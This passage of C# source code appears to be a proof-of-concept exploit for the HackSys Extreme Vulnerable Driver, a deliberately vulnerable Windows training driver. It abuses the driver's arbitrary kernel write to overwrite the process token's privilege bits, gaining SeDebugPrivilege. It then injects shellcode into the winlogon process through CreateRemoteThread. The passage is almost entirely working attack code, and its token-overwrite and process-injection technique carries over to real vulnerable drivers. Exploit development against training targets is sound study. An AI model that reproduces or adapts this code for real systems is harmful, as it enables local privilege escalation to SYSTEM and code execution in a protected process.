"[+] {0} bytes shellcode is written in winlogon process.",
returnedBytes);
IntPtr lpflOldProtect = Marshal.AllocHGlobal(IntPtr.Size);
if (!VirtualProtectEx(
hProcess,
buffer,
shellcode.Length,
AllocationProtectEnum.PAGE_EXECUTE_READ,
lpflOldProtect))
{
error = Marshal.GetLastWin32Error();
Console.WriteLine("[-] Failed to change memory protection");
Console.WriteLine(" |-> {0}\n", GetWin32ErrorMessage(error, false));
Marshal.FreeHGlobal(lpflOldProtect);
CloseHandle(hProcess);
return false;
}
Marshal.FreeHGlobal(lpflOldProtect);
IntPtr hNewThread = CreateRemoteThread(
hProcess,
IntPtr.Zero,
0,
buffer,
IntPtr.Zero,
0,
IntPtr.Zero);
if (hNewThread == IntPtr.Zero)
{
error = Marshal.GetLastWin32Error();
Console.WriteLine("[-] Failed to create shellcode thread.");
Console.WriteLine(" |-> {0}\n", GetWin32ErrorMessage(error, false));
CloseHandle(hProcess);
return false;
}
Console.WriteLine("[+] Shellcode thread is created successfully.");
Console.WriteLine(" |-> New thread handle: 0x{0}", hNewThread.ToString("X"));
CloseHandle(hProcess);
return true;
}
static void OverwriteTokenPrivileges(
IntPtr hDevice,
IntPtr tokenPointer,
ulong privValue)
{
IntPtr pParent = new IntPtr(tokenPointer.ToInt64() + 0x40);
IntPtr pEnabled = new IntPtr(tokenPointer.ToInt64() + 0x48);
Console.WriteLine("[>] Trying to overwrite token.");
WritePointer(hDevice, pParent, new IntPtr((long)privValue));
WritePointer(hDevice, pEnabled, new IntPtr((long)privValue));
}
static void WritePointer(IntPtr hDevice, IntPtr where, IntPtr what)
{
uint ioctl = 0x22200B;
IntPtr inputBuffer = Marshal.AllocHGlobal(IntPtr.Size * 2);
IntPtr whatBuffer = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.Copy(BitConverter.GetBytes(what.ToInt64()), 0, whatBuffer, IntPtr.Size);
IntPtr[] inputArray = new IntPtr[2];
inputArray[0] = whatBuffer; // what
inputArray[1] = where; // where
Marshal.Copy(inputArray, 0, inputBuffer, 2);
DeviceIoControl(hDevice, ioctl, inputBuffer, (IntPtr.Size * 2),
IntPtr.Zero, 0, IntPtr.Zero, IntPtr.Zero);
Marshal.FreeHGlobal(whatBuffer);
Marshal.FreeHGlobal(inputBuffer);
}
static void ZeroMemory(IntPtr buffer, int size)
{
var nullBytes = new byte[size];
Marshal.Copy(nullBytes, 0, buffer, size);
}
static void Main()
{
Console.WriteLine("--[ HEVD Kernel Write PoC : SeDebugPrivilege - Code Injection\n");
if (!Environment.Is64BitOperatingSystem)
{
Console.WriteLine("[!] 32 bit OS is not supported.\n");
return;
}
else if (IntPtr.Size != 8)
{
Console.WriteLine("[!] Should be built with 64 bit pointer.\n");
return;
}
Console.WriteLine("[*] Current account is \"{0}\\{1}\"", Environment.UserDomainName, Environment.UserName);
Console.WriteLine("[>] Trying to find token address for this process.");
IntPtr pCurrentToken = GetCurrentProcessTokenPointer();
if (pCurrentToken == IntPtr.Zero)
{
Console.WriteLine("[-] Failed to find nt!_TOKEN.");
return;
}
else
{
Console.WriteLine("[+] nt!_TOKEN for this process @ 0x{0}", pCurrentToken.ToString("X16"));
}
string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
IntPtr hDevice = GetDeviceHandle(deviceName);
if (hDevice == IntPtr.Zero)
{
Console.WriteLine("[-] Failed to open {0}", deviceName);
return;
}
var privs = (ulong)SepTokenPrivilegesFlags.DEBUG;
OverwriteTokenPrivileges(hDevice, pCurrentToken, privs);
CloseHandle(hDevice);
InjectToWinlogon();
}
}
}